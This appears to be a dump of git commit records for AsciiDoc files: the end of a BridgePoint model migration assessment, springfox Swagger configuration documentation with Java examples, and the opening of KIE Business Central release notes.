a hierarchical set of directories and flat ASCII files.\nThe file formats have been documented by the user. A spreadsheet containing\nextracted model data with labeled header columns can be found here [<<dr-7,2.7>>].\n\n=== Integrity\nA mechanism for ensuring the integrity of model conversion was created for\nMASL to xtUML and xtUML to MASL. The mechanism recognizes that models\nneed to be converted in \"both directions\", from MASL to xtUML and from xtUML\nto MASL. Thus, a model can be converted and then converted back and compared\nto the original input.\n\nWASL can be converted to xtUML. And then that xtUML model can be exported\nas WASL. The output WASL of the second step can be compared to input WASL\nof the first step. Allowing for non-semantic ordering and spacing, the\nfile contents should be identical.\n\nThis process can be automated.\n\n==== WASL Round-Trip\n_Round-Trip Testing_ automates the above integrity checks on\narbitrary sets of models. Round-trip testing was used in a previous\nproject to validate the conversion process on proprietary user models\nsecured on a private internal network. The user ran the round-trip\ntesting script on subsets of to-be-converted customer models. Problems\nwere encountered. The user crafted small, non-proprietary test models\nwhich isolated the problem construct. 
The problem was reported to the\nBridgePoint engineering team along with the reproduction model.\nIssues were resolved until 100% of the user model repository converted\ncleanly. See <<roundtrip-image>>.\n\n[[roundtrip-image]]\nimage::roundtrip.png[Round Trip Testing]\nRound Trip Testing of User Models\n\nA round-trip testing approach can be taken with WASL. A script can\nbe created which automates the conversion\/import of WASL models into\nBridgePoint followed by the export of WASL from BridgePoint\/xtUML.\nThe output can be compared to the input. A report (scorecard) can\nbe generated. The scorecard can be driven to 100% success.\n\n* The script can be run behind a secure firewall on actual user\nmodel data. Then results can be reported without exposing user IP.\n* Small models that reproduce errors identified can be created and\nadded to a regression test suite.\n* The process is clear and measurable and drives out defects.\n\n=== Configuration Management Analysis\n\n[[clearcase-flow]]\nimage::clearcase.png[ClearCASE Revision Progression]\nClearCASE Revision Progression\n\nConfiguration management is supplied in the BridgePoint tool. However,\nconfiguration management is not a component of BridgePoint proper.\nBridgePoint is built upon an Eclipse [<<dr-9,2.9>>] framework. This allows the\nengineering of BridgePoint to focus on modeling and methodology.\nA separation of concerns is made between model editing\/simulation\/compilation\nand the underlying concerns such as desktop organization, color schemes,\nfonts, menu frameworks, file system access, target code compilation and\nconfiguration management.\n\nIn BridgePoint, configuration management is supplied through an Eclipse API\ncalled _TEAM_. The TEAM interface abstracts configuration management away\nfrom the specifics of particular CM implementations such as Git, CVS,\nSubversion, ClearCASE, Dimensions and others. Check-out,\ncheck-in, branch, merge and the like are supported but operate on file\nsystem resources such as files and directories.\n\nBridgePoint persists its model data as ASCII files on the file system\n(presently in an SQL syntax). A model is logically and semantically\nsubdivided into Eclipse projects and UML _packages_. This partitioning\nallows models to be version-controlled in a scalable fashion that enables\nteams of engineers to work in parallel at the domain level, class diagram\nlevel or at the level of individual classes and state machines.\n\nNote that since BridgePoint persists model data as ASCII files in an open,\naccessible and documented format, users have the option of performing\nconfiguration management independently from the BridgePoint tool.\nIn such a situation no dependencies on Eclipse, TEAM and\/or BridgePoint\nexist. It is comforting to understand that user data is wide open and\ncan be managed in the way best suited to existing source code management\nprocedures.\n\nThe Eclipse TEAM API is accessed naturally while editing model elements\nwithin the model hierarchy. Checking out and checking in models are\naccomplished in a manner consistent with other forms of source code.\n\n=== WACA Model Compiler Migration\nWACA represents valuable intellectual property (IP). It embodies the\nsoftware architecture. Rules of translation from Shlaer-Mellor platform\nindependent models (PIMs) are manifest as a separate concern. WACA contains\nno application-specific information; it is platform specific. 
Multiple\napplications are translated with this model compiler.\n\nModel-based model compilation technology is advancing. Model-based model\ncompilers are more portable and can be developed to generate code faster\nthan previous approaches. WACA follows the traditional interpreted\narchetype approach to code generation. Effort to convert it to newer\napproaches would take time and require access to the architecture source.\n\n== Conclusions and Recommendations\n\nAs stated in <<Introduction and Background>>, there are significant\nchallenges to face. However, this project has the advantage of following\nafter project Raven [<<dr-3,2.3>>] which shared a similar set of requirements\nand produced tooling that can be leveraged to a significant extent.\nThe Raven project spanned roughly two calendar years with varying degrees\nof engineering and engagement during that time. A larger quantity of\nmodel data needed to be migrated. There was no room for flaws in the\nmigration process; 100% integrity needed to be achieved. The requirements\non editing the models were similar to the present project. A model\ncompiler tool chain was to be preserved; this was accomplished.\n\nThe fundamental conclusion is that a migration from iUML with ASL activities\nonto BridgePoint with ASL activities is feasible. The cost in terms of\nengineering effort will be significantly lower based on work already done\nin Raven and during this Assessment.\n\nThe recommendation of One Fact is to proceed with a migration and retain\nASL as the action language during the migration.\n\nMASL should be considered as an alternate action language at some point\nafter a migration. But at the present time, reasons to switch are not\ncompelling.\n\nThe following sections will highlight conclusions and recommendations\nitem by item. These sections are not intended to replace Software\nRequirements Specifications, project plans, and Statements of Work.\nThese sections simply summarize the results of the Assessment and\ncommunicate a high-level overview of recommended Next Steps.\nSizings, resource allocation and time schedules will be more accurately\nprovided in project documentation should such projects be commissioned.\n\n=== Action Language\nThis analysis concludes that a migration staying with ASL is the best first\nstep even if a migration to MASL (next choice) is desired in the future.\nWe recommend that ASL be used as the action language for the immediate\nfuture. We recommend that MASL be considered after a successful migration\nof existing models.\n\n. Stay with ASL until the tool migration is complete.\n. Consider MASL as a long term strategy.\n\n=== ASL Editor\n. Add keyword highlighting in the first version of the ASL activity editor.\nThis will avoid a sense of \"stepping backwards\" from the iUML activity editor.\n. Add auto-indentation; it is a relatively low effort for a nice feature.\n. Plan for real-time name validation and context-sensitive assistance.\n. At a later time, consider the cost\/benefit of rename\/refactor.\n\nMost of this work is best done by the BridgePoint engineering team.\nHowever, it may be worth exploring a port of the iUML simulator\nto parse ASL activities and vet out syntax errors before compilation.\n\n=== WASL2MASL\n- This will be valuable if a migration to MASL is decided upon in the\nfuture. It is of no value otherwise.\n\n=== WASL2xtUML\n- This is core. 
Perform this task in the first phase of development.\n- Provide a command line interface to the conversion to support automation.\n- Retain the BridgePoint engineering team for this work.\n\n=== xtUML2WASL\n- This is core. Perform this task in the first phase of development.\n- Obtain capability from within BridgePoint and from the command line.\n- Retain the BridgePoint engineering team for this work.\n\n=== File Formats\n- Using the documented file formats, build a parser to consume these files\nas part of WASL2xtUML conversion.\n\n=== Conversion Integrity and WASL Round Trip\n- In order to satisfy the need for high integrity in the conversion of\nWASL to xtUML and xtUML to WASL, employ the round-trip strategy to achieve\na high degree of confidence in the conversion. This also reduces risk of\nwasted graphical editing effort on models that need to be reconverted.\n- The tooling for this work is best done by the BridgePoint engineering\nteam. Running the scripts locally is best done by a local engineer with\naccess to the model data.\n\n=== Diagram Editing\n1. Be certain model conversion is sound before performing manual diagram\nrearrangement.\n2. Consider rearranging diagram layouts as needed. There may be little\nreason to lay out a diagram that is not being viewed on a regular basis.\n3. Employ `Oblique` and `Rectilinear` routing strategies during layout.\n4. Employ your own engineering talent for this work due to security\nclearance requirements.\n\n=== xtUML and BridgePoint Training\nIt is important to ramp up tooling knowledge within the organization.\nThis means that knowledge transfer begins with a few and increases to\nmore, and that expertise exists heavily in a few and lightly in many.\nThere is a continuum of tooling and methodology expertise: it is at its\npeak (in capability and cost) outside the company with consultants, high\nwith a few people inside the shop, and adequate with everyone else using\nthe tool.\n\nTo achieve this balance, a plan must be established. Following are\nrecommendations to be incorporated into the training plan.\n\n. Designate one or two internal champions now.\n. Begin training up the local champion during the Assessment and through\nthe first phase of the model\/tool migration projects.\n. Use a combination of online resources and on-site training.\n. Have a few engineers work through the online training materials.\n. Designate a primary contact to the BridgePoint team and to the xtUML\nCommunity including access to BridgePoint issue trackers and configuration\nmanagement repositories.\n. Schedule the _Basic xtUML Modeling_ course for the champion and a few\nearly adopters.\n. Plan to push training deeper into the organization as modeling projects\nroll out.\n\n=== Configuration Management\n. Adopt a configuration management strategy that is compatible with the\nversion control of other source artifacts in your organization (probably\nClearCASE).\n. Spend time practicing configuration management of BridgePoint xtUML models.\n - create a branch\n - check-out\n - check-in\n - merge branches\n - resolve a conflict\n\n=== Model Compiler Migration\nAt this point, WACA should be preserved and reused. Migration away from\nWACA should be considered only after a successful migration of iUML\napplication models into new tooling.\n\n. Protect and preserve the IP of the WACA model compiler.\n. Consider options for improving the throughput and maintainability of WACA\nafter initial model migration has settled.\n
. Consider placing WACA into the public domain at some point in the future.\nThis may result in community engagement and additional resources maintaining\nthe architecture.\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"698e13dd181103f6e03f54a8101f954c8699dc7b","subject":"Added documentation on externalizing descriptions to properties","message":"Added documentation on externalizing descriptions to properties\n\nresolves #1232\n","repos":"springfox\/springfox,springfox\/springfox,springfox\/springfox,springfox\/springfox","old_file":"docs\/asciidoc\/current-documentation.adoc","new_file":"docs\/asciidoc\/current-documentation.adoc","new_contents":"== Configuring Springfox\n\n:releaseVersion: {springfox-released-version}\n:snapshotVersion: {springfox-current-version}\n\nTo enable support for swagger specification 1.2 use the ```@EnableSwagger``` annotation\n\nTo enable support for swagger specification 2.0 use the ```@EnableSwagger2``` annotation\n\nTo document the service we use a ```Docket```. This is changed to be more in line with the fact that expressing the\ncontents of the documentation is agnostic of the format in which the documentation is rendered.\n\nDocket https:\/\/www.wordnik.com\/words\/docket[stands for] *A summary or other brief statement of the contents of a\ndocument; an abstract.*\n\n`Docket` helps configure a subset of the services to be documented and groups them by name. A significant change\nis the ability to provide expressive, predicate-based API selection.\n\n```java\n import static springfox.documentation.builders.PathSelectors.*;\n import static com.google.common.base.Predicates.*;\n\n @Bean\n public Docket swaggerSpringMvcPlugin() {\n return new Docket(DocumentationType.SWAGGER_2)\n .groupName(\"business-api\")\n .select()\n \/\/Ignores controllers annotated with @CustomIgnore\n .apis(not(withClassAnnotation(CustomIgnore.class))) \/\/Selection by RequestHandler\n .paths(paths()) \/\/ and by paths\n .build()\n .apiInfo(apiInfo())\n .securitySchemes(securitySchemes())\n .securityContext(securityContext());\n }\n\n \/\/Here is an example where we select any api that matches one of these paths\n private Predicate<String> paths() {\n return or(\n regex(\"\/business.*\"),\n regex(\"\/some.*\"),\n regex(\"\/contacts.*\"),\n regex(\"\/pet.*\"),\n regex(\"\/springsRestController.*\"),\n regex(\"\/test.*\"));\n }\n\n```\n\nFor a list of handy predicates, look at https:\/\/github.com\/springfox\/springfox\/blob\/master\/springfox-core\/src\/main\/java\/springfox\/documentation\/builders\/RequestHandlerSelectors.java[RequestHandlerSelectors]\nand https:\/\/github.com\/springfox\/springfox\/blob\/master\/springfox-core\/src\/main\/java\/springfox\/documentation\/builders\/PathSelectors.java[PathSelectors].\n\n=== Configuring the ObjectMapper\n\nA simple way to configure the object mapper is to listen for the ```ObjectMapperConfigured``` event. Regardless of\nwhether there is a customized ObjectMapper in play with a corresponding MappingJackson2HttpMessageConverter, the\nlibrary always has a configured ObjectMapper that is customized to serialize swagger 1.2 and swagger 2.0 types.\n\nIn order to do this, implement the ```ApplicationListener<ObjectMapperConfigured>``` interface. The event has a handle\n to the ObjectMapper that was configured. 
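\n\nA minimal sketch of such a listener is shown below. The event type's package (`springfox.documentation.schema.configuration.ObjectMapperConfigured`) and its `getObjectMapper()` accessor are assumptions based on the springfox 2.x sources, so verify them against the version you depend on.\n\n```java\nimport com.fasterxml.jackson.annotation.JsonInclude;\nimport org.springframework.context.ApplicationListener;\nimport org.springframework.stereotype.Component;\nimport springfox.documentation.schema.configuration.ObjectMapperConfigured;\n\n@Component\npublic class ObjectMapperCustomizer implements ApplicationListener<ObjectMapperConfigured> {\n\n  @Override\n  public void onApplicationEvent(ObjectMapperConfigured event) {\n    \/\/ Fires once per ObjectMapper that springfox configures, so this\n    \/\/ customization reaches every mapper in play.\n    event.getObjectMapper().setSerializationInclusion(JsonInclude.Include.NON_NULL);\n  }\n}\n```\n\n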
Configuring application specific ObjectMapper customizations in this\n application event handler guarantees that application specific customizations will be applied to each and every\n ObjectMapper that is in play.\n\nIf you encounter a NullPointerException during application startup like https:\/\/github.com\/springfox\/springfox\/issues\/635[this issue], it is most likely because the ```WebMvcConfigurerAdapter``` isn't working.\nThese adapters, especially in non-spring-boot scenarios, will only get loaded if the @EnableWebMvc\nhttp:\/\/docs.spring.io\/spring\/docs\/current\/javadoc-api\/org\/springframework\/web\/servlet\/config\/annotation\/WebMvcConfigurer.html[annotation is present].\n\nIf using Spring Boot Web MVC, there is no need to use the @EnableWebMvc annotation, as the framework automatically detects Web MVC usage and configures itself as appropriate.\nIn this scenario, Springfox will not correctly generate and expose the Swagger UI endpoint (`\/swagger-ui.html`) if @EnableWebMvc is present in the application.\n\nA caveat to using the library is that it depends on Jackson for serialization, most importantly the `ObjectMapper`. A\ngood example of where this breaks down is the following http:\/\/stackoverflow.com\/a\/30220562\/19219[issue when using Gson serialization]\n\n=== Customizing the swagger endpoints.\n\nBy default, the swagger service descriptions are generated at the following urls:\n\n[options=\"header,footer\"]\n|=======================\n|Swagger version | Documentation Url | Group\n|1.2 | \/api-docs | implicit *default* group\n|1.2 | \/api-docs?group=external | *external* group via docket.groupName()\n|2.0 | \/v2\/api-docs | implicit *default* group\n|2.0 | \/v2\/api-docs?group=external | *external* group via docket.groupName()\n|=======================\n\nTo customize these endpoints, loading a http:\/\/docs.spring.io\/spring\/docs\/current\/javadoc-api\/org\/springframework\/context\/annotation\/PropertySource.html[property source] with the following properties\nallows the properties to be overridden\n\n[options=\"header,footer\"]\n|=======================\n|Swagger version | Override property\n|1.2 | springfox.documentation.swagger.v1.path\n|2.0 | springfox.documentation.swagger.v2.path\n|=======================\n\n=== Configuring startup.\nIf you'd like to delay the startup of springfox, you could choose to set auto-startup to false. The property to use\nis `springfox.documentation.auto-startup` and this could either be passed in as a `-D` jvm arg or via a property in\n`application.yml\/properties` file.\n[options=\"header,footer\"]\n|=======================\n|Override property | description\n| true | This is the default value, which starts scanning for endpoints automatically when\nthe spring context is refreshed.\n| false | This setting starts scanning for endpoints only when the `Lifecycle#start()` method is called explicitly.\nThis is very useful for frameworks like grails that have their own lifecycle. It indicates that the library\nuser is responsible for starting the `DocumentationPluginsBootStrapper` lifecycle.\n|=======================\n\nWARNING: Change this default to `false` with caution. This implies managing the startup of the plugins prior to\nrequesting the swagger endpoints in a thread-safe manner.\n\n=== Overriding descriptions via properties\nSupport has been added for resolving properties in property sources to replace expressions in certain annotations. 
In order to use it, simply define properties in `application.properties`, an `application.yml` file, or property files on your\n classpath with values that you'd like to see replaced in known annotations. For example, `@ApiModelProperty(value=\"${property1.description}\")`\n will evaluate `property1.description` from the available properties. If none is found, it will render the\n unresolved expression as-is.\n\nThe currently supported annotations are listed below, in order of priority within the annotation:\n\n[options=\"header,footer\"]\n|=======================\n|Annotation | attribute | target property| description\n| ApiModelProperty | value | ModelProperty#description |e.g. `@ApiModelProperty(value=\"${property1.description}\")`\n| ApiModelProperty | description | ModelProperty#description |e.g. `@ApiModelProperty(notes=\"${property1.description}\")`\n| ApiParam | value | Parameter#description |e.g. `@ApiParam(value=\"${param1.description}\")`\n| ApiImplicitParam | value | Parameter#description |e.g. `@ApiImplicitParam(value=\"${param1.description}\")`\n| ApiOperation | notes | Operation#notes |e.g. `@ApiOperation(notes=\"${operation1.description}\")`\n| ApiOperation | summary | Operation#summary |e.g. `@ApiOperation(value=\"${operation1.summary}\")`\n| RequestParam | defaultValue | Parameter#defaultValue |e.g. `@RequestParam(defaultValue=\"${param1.defaultValue}\")`\n| RequestHeader | defaultValue | Parameter#defaultValue |e.g. `@RequestHeader(defaultValue=\"${param1.defaultValue}\")`\n|=======================\n\n=== Overriding property datatypes\n\nUsing `ApiModelProperty#dataType` we can override the inferred data types. However, it is restricted:\n data types may only be specified with a fully qualified class name. For example, if we have the following\n definition\n\n[source,java,linenums]\n----\n\n\/\/ if com.qualified.ReplaceWith is not a Class that can be created using Class.forName(...)\n\/\/ Original will be replaced with the new class\n@ApiModelProperty(dataType = \"com.qualified.ReplacedWith\")\npublic Original getOriginal() { ... }\n\n\/\/ if ReplaceWith is not a Class that can be created using Class.forName(...) Original will be preserved\n@ApiModelProperty(dataType = \"ReplaceWith\")\npublic Original getAnotherOriginal() { ... }\n\n----\n\nNOTE: In the case of `ApiImplicitParam#dataType`, since the type itself is usually a scalar type (string, int)\nuse one of the base types specified in the Types class =>\n`springfox-schema\/src\/main\/java\/springfox\/documentation\/schema\/Types.java`\n\n[source,groovy,linenums]\n----\ninclude::..\/..\/springfox-schema\/src\/main\/java\/springfox\/documentation\/schema\/Types.java[lines=42..55]\n----\n\n\n=== Docket XML Configuration\n\nTo use the plugin you must create a spring java configuration class which uses spring's `@Configuration`.\nThis config class must then be defined in your xml application context.\n\n\n```xml\n<!-- Required so springfox can access spring's RequestMappingHandlerMapping -->\n<mvc:annotation-driven\/>\n\n<!-- Required to enable Spring post processing on @Configuration classes. -->\n<context:annotation-config\/>\n\n<bean class=\"com.yourapp.configuration.MySwaggerConfig\"\/>\n```\n\n```java\n\n@Configuration\n@EnableSwagger \/\/Loads the spring beans required by the framework\npublic class MySwaggerConfig {\n\n \/**\n * Every Docket bean is picked up by the swagger-mvc framework - allowing for multiple\n * swagger groups i.e. 
same code base, multiple swagger resource listings.\n *\/\n @Bean\n public Docket customDocket(){\n return new Docket(); \/\/some customization goes here\n }\n\n}\n```\n\n\n=== Docket Spring Java Configuration\n\n- Use the `@EnableSwagger` or `@EnableSwagger2` annotation.\n- Define one or more Docket instances using spring's `@Bean` annotation.\n\n```java\n@Configuration\n@EnableWebMvc \/\/NOTE: Only needed in a non-springboot application\n@EnableSwagger2\n@ComponentScan(\"com.myapp.controllers\")\npublic class CustomJavaPluginConfig {\n\n\n @Bean \/\/Don't forget the @Bean annotation\n public Docket customImplementation(){\n return new Docket()\n .apiInfo(apiInfo());\n \/\/... more options available\n\n }\n\n \/\/...\n}\n```\n\n=== Support for documentation from property file lookup\n\nStarting with `2.7.0` we support looking up descriptions from the following annotations given a property just like\nproperty place holders resolve a value annotation `@Value(${key})`. The following annotation attributes support\ndescription resolution.\n\n- `@ApiParam#value()`\n- `@ApiImplicitParam#value()`\n- `@ApiModelProperty#value()`\n- `@ApiOperation#value()`\n- `@ApiOperation#notes()`\n- `@RequestParam#defaultValue()`\n- `@RequestHeader#defaultValue()`\n\nBelow are examples of how it would work:\n\n[[controller-description]]Controller Example\n[source,java]\n.SomeController.java\n----\n\n @ApiOperation(value = \"Find pet by Status\",\n notes = \"${SomeController.findPetsByStatus.notes}\"...) \/\/<1>\n @RequestMapping(value = \"\/findByStatus\", method = RequestMethod.GET, params = {\"status\"})\n public Pet findPetsByStatus(\n @ApiParam(value = \"${SomeController.findPetsByStatus.status}\", \/\/<2>\n required = true,...)\n @RequestParam(\"status\",\n defaultValue=\"${SomeController.findPetsByStatus.status.default}\") String status) { \/\/<3>\n \/\/...\n }\n\n @ApiOperation(notes = \"Operation 2\", value = \"${SomeController.operation2.value}\"...) \/\/<4>\n @ApiImplicitParams(\n @ApiImplicitParam(name=\"header1\", value=\"${SomeController.operation2.header1}\", ...) \/\/<5>\n )\n @RequestMapping(value = \"operation2\", method = RequestMethod.POST)\n public ResponseEntity<String> operation2() {\n return ResponseEntity.ok(\"\");\n }\n----\n\n<1> Example of `@ApiOperation#notes()`\n<2> Example of `@ApiParam#value()`\n<3> Example of `@RequestParam#defaultValue()`\n<4> Example of `@ApiOperation#value()`\n<5> Example of `@ApiImplicitParams#value()`\n\n[[model-description]]Model Example\n\n[source,java]\n.SomeModel.java\n----\n public class SomeModel {\n @ApiModelProperty(value = \"${SomeModel.someProperty}\", ...) \/\/<1>\n private long someProperty;\n }\n----\n\n<1> Example of `@ApiModelProperty#value()`\n\nTo provide these properties via external properties, just add them to your application property file or any property\nsource configured by the application as shown below. When a property place holder cannot be found, the default\nbehavior is to echo the expression as-is.\n\n[source,properties]\n.application.properties\n----\nSomeController.findPetsByStatus.notes=Finds pets by status\nSomeController.findPetsByStatus.status=Status could be one of ...\nSomeController.operation2.header1=Header for bla bla...\nSomeController.operation2.value=Operation 2 do something...\nSomeModel.someProperty=Some property description\n----\n\n==== Swagger group\n\nA swagger group is a concept introduced by this library which is simply a unique identifier for a Swagger Resource Listing\nwithin your application. 
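\n\nFor example (a sketch: the group names and path regexes below are made up for illustration, and the same static imports as the first `Docket` example are assumed), two Resource Listings can be published simply by defining two `Docket` beans with distinct group names:\n\n```java\n @Bean\n public Docket publicApi() {\n return new Docket(DocumentationType.SWAGGER_2)\n .groupName(\"public-api\")\n .select()\n .paths(regex(\"\/public.*\")) \/\/select the publicly facing endpoints\n .build();\n }\n\n @Bean\n public Docket internalApi() {\n return new Docket(DocumentationType.SWAGGER_2)\n .groupName(\"internal-api\")\n .select()\n .paths(regex(\"\/internal.*\")) \/\/select the internally facing endpoints\n .build();\n }\n```\n\nEach group is then served from its own documentation endpoint, e.g. `\/v2\/api-docs?group=public-api`, per the endpoint table earlier.\n\n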
The reason this concept was introduced was to support applications which require more than one\nResource Listing. Why would you need more than one Resource Listing?\n\n- A single Spring Web MVC application serves more than one API, e.g. publicly facing and internally facing.\n- A single Spring Web MVC application serves multiple versions of the same API, e.g. v1 and v2.\n\nIn most cases an application will not need more than one Resource Listing and the concept of swagger groups can be ignored.\n\n==== Configuring the output of _operationId_ in a Swagger 2.0 spec\n\nAs defined https:\/\/github.com\/swagger-api\/swagger-spec\/blob\/master\/versions\/2.0.md#fixed-fields-5[`operationId` was\nintroduced] in the Swagger 2.0 spec, the `operationId` parameter, which was referred to as `nickname` in pre-2.0\nversions of the Swagger spec, provides the author a means by which to describe an API operation with a friendly name.\nThis field is often used by consumers of a Swagger 2.0 spec in order to name functions in generated clients. An\nexample of this can be seen in the https:\/\/github.com\/swagger-api\/swagger-codegen[swagger-codegen project].\n\n===== The default value of `operationId` according to Springfox\n\nBy default, when using Springfox in Swagger 2.0 mode, the value of `operationId` will be rendered using the\nfollowing structure: \"`[java_method_name_here]Using[HTTP_verb_here]`\". For example, if one has a method `getPets()`\nconnected to an HTTP GET verb, Springfox will render `getPetsUsingGET` for the operationId.\n\n====== Given this annotated method ...\n\n```java\n@ApiOperation(value = \"\")\n@RequestMapping(value = \"\/pets\", method = RequestMethod.GET)\npublic Model getAllThePets() {\n ...\n}\n```\n\n====== the default `operationId` will render looking like this:\n\n```json\n\n\"paths\": {\n \"\/pets\": {\n \"get\": {\n ...\n \"operationId\":\"getAllThePetsUsingGET\"\n ...\n }\n }\n}\n\n```\n\n===== Customizing the value of _operationId_\n\nIn the event you wish to override the default `operationId` which Springfox renders, you may do so by providing the\n`nickname` element in an `@ApiOperation` annotation.\n\n====== Given this annotated method ...\n\n```java\n@ApiOperation(value = \"\", nickname = \"getMeAllThePetsPlease\")\n@RequestMapping(value = \"\/pets\", method = RequestMethod.GET)\npublic Model getAllThePets() {\n ...\n}\n```\n\n====== ... the customized *operationId* will render looking like this:\n\n```json\n\n\"paths\": {\n \"\/pets\": {\n \"get\": {\n ...\n \"operationId\":\"getMeAllThePetsPlease\"\n ...\n }\n }\n}\n\n```\n\n==== Changing how Generic Types are Named\n\nBy default, types with generics will be labeled with '\\u00ab'(<<), '\\u00bb'(>>), and commas. This can be problematic\nwith things like swagger-codegen. You can override this behavior by implementing your own `GenericTypeNamingStrategy`.\nFor example, if you wanted `List<String>` to be encoded as 'ListOfString' and `Map<String, Object>`\nto be encoded as 'MapOfStringAndObject' you could set the `forCodeGeneration` customization option to `true` during\nplugin customization:\n\n```java\n docket.forCodeGeneration(true|false);\n```\n\n=== Caching\n\nThe caching feature that was introduced in 2.1.0 has been removed. Springfox no longer uses the cache abstraction to\nimprove the performance of the api scanners and readers. It has been rolled into the library as an internal implementation\ndetail as of 2.1.2. 
This is a runtime breaking change; however, since it is not really an api-compatibility-breaking change\nbeyond the configuration change introduced in consuming applications, we're not incrementing the minor version.\n\n=== Configuring Security Schemes and Contexts: an Overview\n\nThe security provisions in SpringFox at a high level, without getting into the code, have different pieces\nthat all work together in concert:\n\n- The API itself needs to be protected. This is achieved by using, for simplicity's sake, spring security and may also\nuse a combination of servlet container and tomcat\/jersey etc.\n- The security scheme, which describes the techniques you've used to protect the api. Springfox supports whatever\nschemes the swagger specification supports (ApiKey, BasicAuth and OAuth2 (certain profiles)).\n- Finally, the security contexts, which actually provide information on which api's are protected by which schemes.\nThe security context is often the missing piece of the puzzle; see xref:getting-started-spring-boot[15].\n\n=== Example application\n\nFor examples of spring-boot and vanilla spring applications, take a look at the https:\/\/github.com\/springfox\/springfox-demos[examples]\nin the demo application.\n\n== Configuring springfox-staticdocs\n\nIMPORTANT: Support for this module has been deprecated in 2.7.0. Since swagger2markup doesn't support jdk6 anymore, it is\ndifficult for the build to co-exist with the newer version of swagger2markup. Please use the\n_latest_ instructions provided in the awesome https:\/\/github.com\/Swagger2Markup\/swagger2markup[Swagger2Markup Library].\n\n== Security\n\nThanks to https:\/\/github.com\/mojaiq[Javed Mohammed] we now have an example https:\/\/github.com\/springfox\/springfox-oath2-demo[oauth demo].\n\nNOTE: this is based on swagger-ui pre 3.x\n\n","old_contents":"
=== Example application\n\nFor examples of spring-boot and vanilla spring applications, take a look at the\nhttps:\/\/github.com\/springfox\/springfox-demos[demo applications].\n\n== Configuring springfox-staticdocs\n\nIMPORTANT: Support for this module has been deprecated in 2.7.0. Since swagger2markup doesn't support jdk6 anymore, it is\ndifficult for the build to co-exist with the newer version of swagger2markup. Please use the\n_latest_ instructions provided in the awesome https:\/\/github.com\/Swagger2Markup\/swagger2markup[Swagger2Markup Library].\n\n== Security\n\nThanks to https:\/\/github.com\/mojaiq[Javed Mohammed] we now have an example https:\/\/github.com\/springfox\/springfox-oath2-demo[oauth demo].\n\nNOTE: This is based on swagger-ui pre-3.x.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d97d551d7ed2b2e9fcdfb806b51cd79a091632d","subject":"BXMSDOC-1910 updated Aliases formatting","message":"BXMSDOC-1910 updated Aliases formatting\n","repos":"manstis\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs","old_file":"docs\/product-release-notes\/src\/main\/asciidoc\/con-bxms-rn-whats-new.adoc","new_file":"docs\/product-release-notes\/src\/main\/asciidoc\/con-bxms-rn-whats-new.adoc","new_contents":"\n[[bxms_rn_whats_new]]\n= What's New\n\nThis section highlights new features in {PRODUCT} {PRODUCT_VERSION} Limited Availability.\n\n== Business Central\n \n=== Improved Navigation\n\n.Navigation between views\nYou can now navigate as follows:\n\n* From a process instance to the associated jobs\n* From a job to the associated process instance\n* From a process instance to the associated tasks\n\n.Business Central Home page\nThe Business Central Home page has been redesigned for easier navigation. For more information, see the \"Business Central\" chapter of the _{PRODUCT} User Guide_.\n\n=== Guided Decision Table\n* Guided Decision Table has a new wizard for creating and editing columns.\n* Hit policies are now available. Hit policies determine the order in which rules (rows) in a guided decision table are applied.\n* New support to display multiple linked guided decision tables in the Guided Decision Table Editor has been added.\n\n=== Projects Metrics dashboard\nA new dashboard is now available for every project listed in the Projects perspective. The Projects Metrics dashboard shows all of your project contribution metrics in one place. This new dashboard replaces the Contributors page, which was part of the Authoring group. For more information, see the \"Projects Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== Team Metrics dashboard\nThe Team Metrics dashboard shows all project metrics by team in a single page. This new dashboard replaces the older Contributors page, which was part of the Authoring group. For more information, see the \"Team Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== New columns available on process instances, tasks, and jobs\nThe following columns have been added to the corresponding perspectives:\n\n* Process instance list perspective: Last update and correlation key.\n* Task list: Last update, correlation key (of the associated process instance ID), process instance description (of the associated process instance).\n* Jobs perspective: Name of the associated process (if any), ID of the associated process instance (if any), Description of the associated process instance (if any).\n\n=== Advanced search filter\nYou can now search for specific data by using the *Search* tab on the Jobs, Process Instances, Tasks Administration, and Execution Errors perspectives. 
For information about the new search feature, see the \"Using the advanced search filter pages\" section of the _{PRODUCT} {RELEASE} User Guide_.\n\n=== New Task List and Task Administration perspectives\nThe former Task List perspective has been divided into the Tasks List and Task Administration perspectives. The Task List perspective is used by task operators to work with their assigned (or potentially assigned) tasks. The Task Administration perspective is used by administrators to manage tasks assigned to other users. This perspective is only available for users with admin or process-admin roles. It is similar to the Admin filter tab on the former Task List perspective.\n\n=== Improved validation in deployment descriptor editor\n\nThe deployment descriptor editor in Business Central has been improved to validate data entered for the following:\n\n* Work item handlers\n* Event listeners\n* Marshalling strategies\n* Globals\n* Environment entries\n* Configuration\n\nValidation is performed automatically when a build is invoked or manually when a user clicks *Validate*.\n\n=== Error Handling\nThe system now detects and stores execution errors, such as exceptions raised while running a process instance or a job, after the maximum number of retries has been exceeded. If an error occurs, an event is generated that contains the following data:\n\n--\n[cols=\"1,2\",options=\"header\"]\n|===\n| Data\n| Fields\n\n.3+| Process model\n| processModelID\n| processModelVersion\n| processModelName\n\n.2+| Process instance that has failed\n| processInstanceID\n| customProcessID\n\n.5+| Activity that has failed\n| activityID\n| activityName\n| activityType\n| iteration\n| status\n\n.2+| Error data\n| errorMessage: Message with the error that has occurred.\n| errorStack: Stack with error detail.\n|===\n--\n\nThe process instance list includes a new column that displays the number of errors per process instance that are not marked as acknowledged. When you select the column, a window appears that enables you to navigate to the new Error perspective.\n\nThe Execution Errors perspective lists any errors that occur during process instances or executor service jobs on a Decision Server. Use this perspective to help troubleshoot issues. It is visible to users with the admin and process-admin roles.\n\n\n== Process Engine\n\n=== Process and task administration API\nA process administration API and a task administration API have been introduced to simplify some of the more complex administrator use cases; a brief usage sketch follows these lists.\nThe process admin API enables you to:\n\n* Retrieve all process definition nodes\n* Cancel node instances\n* Retrigger node instances\n* Update the timer (absolute or relative)\n* List timer instances\n* Trigger nodes\n\nThe task administration API enables you to:\n\n* Add and remove potential owners, excluded owners, and business administrators\n* Add and remove task inputs and outputs\n* List, create, and cancel escalations and notifications
